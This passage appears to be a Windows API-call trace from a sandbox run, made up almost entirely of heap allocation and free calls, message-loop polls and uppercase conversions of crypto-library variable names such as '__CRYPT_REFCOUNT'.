0x2e55088 [0232.327] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50da0 [0232.327] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ff8 [0232.327] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0232.327] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50ed8 [0232.327] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f788 [0232.327] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f08 [0232.327] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550b8 [0232.327] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e48 [0232.327] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f58 [0232.327] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x140f4) returned 0x2e80330 [0232.384] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f580 [0232.384] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50de8 [0232.384] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550c8 [0232.384] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50de8 | out: hHeap=0x970000) returned 1 [0232.384] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f5a8 [0232.384] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50de8 [0232.384] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f648 [0232.384] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e18 [0232.384] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550e8 [0232.384] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e60 [0232.384] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f760 [0232.385] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f20 [0232.385] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f88 [0232.385] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f38 [0232.385] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78a50 [0232.385] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0232.385] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e00 [0232.385] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f78 [0232.385] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f50 [0232.385] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50fb0 [0232.385] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550a8 [0232.385] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f7b0 [0232.385] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cc8 [0232.385] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f68 [0232.385] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51040 [0232.385] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51058 [0232.385] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e00 | out: hHeap=0x970000) returned 1 [0232.386] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f78 | out: hHeap=0x970000) returned 1 [0232.386] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f50 | out: hHeap=0x970000) returned 1 [0232.386] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0232.386] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e00 [0232.386] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55008 [0232.386] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f50 [0232.386] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51010 [0232.386] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55068 [0232.386] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f5d0 [0232.386] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51178 [0232.386] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f98 [0232.386] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51208 [0232.386] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512b0 [0232.386] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e00 | out: hHeap=0x970000) returned 1 [0232.386] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0232.386] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f50 | out: hHeap=0x970000) returned 1 [0232.387] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0232.387] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e00 [0232.387] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f78 [0232.387] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f50 [0232.387] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51298 [0232.387] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f48 [0232.388] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f3c8 [0232.388] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51070 [0232.388] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fa8 [0232.388] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51130 [0232.388] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511d8 [0232.388] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e00 | out: hHeap=0x970000) returned 1 [0232.388] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f78 | out: hHeap=0x970000) returned 1 [0232.388] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f50 | out: hHeap=0x970000) returned 1 [0232.388] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0232.388] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f50 [0232.388] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550f8 [0232.388] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f50 | out: hHeap=0x970000) returned 1 [0232.388] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f670 [0232.388] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f50 [0232.388] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e00 [0232.388] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fe8 [0232.388] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f558 [0232.388] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511f0 [0232.388] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55108 [0232.389] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511f0 | out: hHeap=0x970000) returned 1 [0232.389] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f490 [0232.389] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51028 [0232.389] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51190 [0232.389] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f670 | out: hHeap=0x970000) returned 1 [0232.389] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550f8 | out: hHeap=0x970000) returned 1 [0232.389] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f50 | out: hHeap=0x970000) returned 1 [0232.389] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0232.389] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f50 [0232.389] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55098 [0232.389] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51250 [0232.389] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51220 [0232.389] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550d8 [0232.389] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f418 [0232.389] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51268 [0232.389] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55038 [0232.389] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510b8 [0232.389] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510d0 [0232.389] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f50 | out: hHeap=0x970000) returned 1 [0232.389] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0232.389] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51250 | out: hHeap=0x970000) returned 1 [0232.389] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0232.389] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f508 [0232.389] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f78 [0232.389] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0232.390] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f508 | out: hHeap=0x970000) returned 1 [0232.390] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f78 | out: hHeap=0x970000) returned 1 [0232.390] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51250 [0232.390] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b28 [0232.390] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0232.390] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550f8 [0232.390] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f04348 [0232.390] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f28 [0232.390] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0232.390] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f04348 | out: hHeap=0x970000) returned 1 [0232.390] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f28 | out: hHeap=0x970000) returned 1 [0232.390] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50fe0 [0232.390] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78810 [0232.390] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0232.390] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ff8 [0232.390] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f78 [0232.390] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f78 | out: hHeap=0x970000) returned 1 [0232.390] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0232.390] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0232.390] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fe0 | out: hHeap=0x970000) returned 1 [0232.390] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fb8 [0232.390] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a68 [0232.390] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a68 | out: hHeap=0x970000) returned 1 [0232.390] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0232.390] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550f8 | out: hHeap=0x970000) returned 1 [0232.390] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77a48 [0232.390] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0232.390] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a48 | out: hHeap=0x970000) returned 1 [0232.390] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0232.391] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f04498 [0232.391] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55078 [0232.391] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0232.391] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f04498 | out: hHeap=0x970000) returned 1 [0232.391] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0232.391] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e511a8 [0232.391] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b70 [0232.391] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0232.391] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55098 [0232.391] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0232.391] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55058 [0232.391] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0232.391] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0232.391] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b70 | out: hHeap=0x970000) returned 1 [0232.391] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511a8 | out: hHeap=0x970000) returned 1 [0232.391] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0232.391] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55028 [0232.391] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0232.391] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b28 | out: hHeap=0x970000) returned 1 [0232.391] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51250 | out: hHeap=0x970000) returned 1 [0232.391] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0232.391] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77a48 [0232.391] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0232.391] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fb8 [0232.391] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f78 [0232.391] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b08 [0232.391] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b08 | out: hHeap=0x970000) returned 1 [0232.391] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f78 | out: hHeap=0x970000) returned 1 [0232.391] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0232.391] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77a88 [0232.392] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0232.392] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a88 | out: hHeap=0x970000) returned 1 [0232.392] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0232.392] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55098 [0232.392] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511a8 [0232.392] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51238 [0232.392] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f28 [0232.392] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f04620 [0232.392] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f78 [0232.392] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0232.392] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f04620 | out: hHeap=0x970000) returned 1 [0232.392] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f78 | out: hHeap=0x970000) returned 1 [0232.392] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51250 [0232.392] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b28 [0232.392] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0232.392] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55048 [0232.392] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fb8 [0232.392] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0232.392] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0232.392] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b28 | out: hHeap=0x970000) returned 1 [0232.392] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51250 | out: hHeap=0x970000) returned 1 [0232.392] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f28 | out: hHeap=0x970000) returned 1 [0232.392] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51250 [0232.392] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550f8 [0232.392] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ff8 [0232.392] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550f8 | out: hHeap=0x970000) returned 1 [0232.392] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511f0 [0232.392] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f38 [0232.392] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51148 [0232.392] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | out: hHeap=0x970000) returned 1 [0232.393] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51280 [0232.393] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55048 [0232.393] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51160 [0232.393] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0232.393] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f508 [0232.393] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511a8 | out: hHeap=0x970000) returned 1 [0232.393] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510e8 [0232.393] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550f8 [0232.393] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550f8 | out: hHeap=0x970000) returned 1 [0232.393] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51088 [0232.393] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f28 [0232.393] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50fc8 [0232.393] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f28 | out: hHeap=0x970000) returned 1 [0232.393] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51100 [0232.393] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55028 [0232.393] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0232.393] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510a0 [0232.393] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f78 [0232.393] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51118 [0232.393] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f78 | out: hHeap=0x970000) returned 1 [0232.393] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78858 [0232.393] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f508 | out: hHeap=0x970000) returned 1 [0232.393] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511a8 [0232.393] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550f8 [0232.393] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550f8 | out: hHeap=0x970000) returned 1 [0232.393] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50fe0 [0232.393] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f28 [0232.393] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511c0 [0232.394] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f28 | out: hHeap=0x970000) returned 1 [0232.394] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51490 [0232.394] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f78 [0232.394] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f78 | out: hHeap=0x970000) returned 1 [0232.394] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51580 [0232.394] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f78 [0232.394] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51388 [0232.394] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f78 | out: hHeap=0x970000) returned 1 [0232.394] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51520 [0232.394] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f78 [0232.394] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f78 | out: hHeap=0x970000) returned 1 [0232.394] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51358 [0232.394] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55058 [0232.394] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514f0 [0232.394] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0232.394] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513a0 [0232.394] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f78 [0232.394] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51430 [0232.394] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51400 [0232.394] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fd8 [0232.394] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55008 [0232.394] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x140f4) returned 0x2e94430 [0232.396] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fd8 | out: hHeap=0x970000) returned 1 [0232.396] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e94430 | out: 